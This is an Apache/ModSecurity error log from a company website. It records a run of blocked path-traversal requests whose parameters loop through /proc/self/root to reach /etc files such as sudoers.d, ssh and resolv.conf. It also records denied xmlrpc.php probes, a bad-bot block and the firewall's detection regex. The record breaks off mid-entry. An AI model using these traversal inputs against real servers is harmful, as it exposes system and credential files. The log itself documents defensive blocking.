[Mon Mar 16 12:09:47.554895 2026] [:error] [pid 10709:tid 140411716749056] [client 74.7.243.203:44592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdOxXjF1vJNtV6CWrzPgAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:53.012507 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:44602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdQXbQATo66fKoS7xMAAAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:53.380612 2026] [access_compat:error] [pid 11972:tid 140411741927168] [client 193.24.211.48:45312] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:09:54.272954 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:52874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdQnbQATo66fKoS7xMAQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:55.426469 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:52878] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdQ5qj1wV0Si-OkefpwAAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:09:56.686499 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.243.203:52882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdRHjZBu2q05ozVU9UTgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:01.003320 2026] [access_compat:error] [pid 32654:tid 140411733534464] [client 193.24.211.48:45326] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:10:01.092828 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:52890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdSbABkC4fWIHEf8HnjgAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:05.707310 2026] [:error] [pid 10709:tid 140411632822016] [client 74.7.243.203:47562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdTRXjF1vJNtV6CWrzQQAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:08.054536 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:47578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdUAlT9VtDQc7bgUys-QAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:09.607859 2026] [access_compat:error] [pid 32654:tid 140411699963648] [client 104.207.40.64:14159] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:10:10.495093 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:47584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdUo6lpbStxTqkSktpdAAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:18.462542 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.243.203:55530] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdWrABkC4fWIHEf8HnlgAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:20.795117 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:55546] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdXJqj1wV0Si-Okefp2gAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:24.822165 2026] [access_compat:error] [pid 10772:tid 140411683178240] [client 104.207.62.33:36827] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:10:27.364109 2026] [access_compat:error] [pid 11972:tid 140411632822016] [client 216.26.250.153:28729] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:10:30.703234 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:60544] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgdZo6lpbStxTqkSktpfQAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:10:39.416857 2026] [access_compat:error] [pid 10709:tid 140411540502272] [client 65.111.1.57:62685] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:10:42.682279 2026] [access_compat:error] [pid 21946:tid 140411683178240] [client 209.50.166.6:59485] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:10:49.254068 2026] [access_compat:error] [pid 21533:tid 140411641214720] [client 209.50.186.27:21809] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:10:56.059513 2026] [access_compat:error] [pid 32654:tid 140411574073088] [client 104.207.35.143:28901] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:11:08.842823 2026] [access_compat:error] [pid 21805:tid 140411557287680] [client 104.207.59.113:18535] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 12:13:54.382773 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.244.31:44626] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgeMv9ocpUE4ed4uDzrnwAAAgY"]
[Mon Mar 16 12:16:10.419070 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:45260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgeunjZBu2q05ozVU9VLQAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:17.643301 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:37742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgewZqj1wV0Si-OkefqMAAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:18.908501 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:37750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgewpqj1wV0Si-OkefqMwAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:20.227007 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.243.203:39472] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgexP9ocpUE4ed4uDzrsQAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:21.409388 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:39474] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgexZqj1wV0Si-OkefqOAAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:22.600963 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:39478] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgexv9ocpUE4ed4uDzrswAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:23.755794 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:39492] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgexxXjF1vJNtV6CWrzcQAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:26.238203 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:39508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 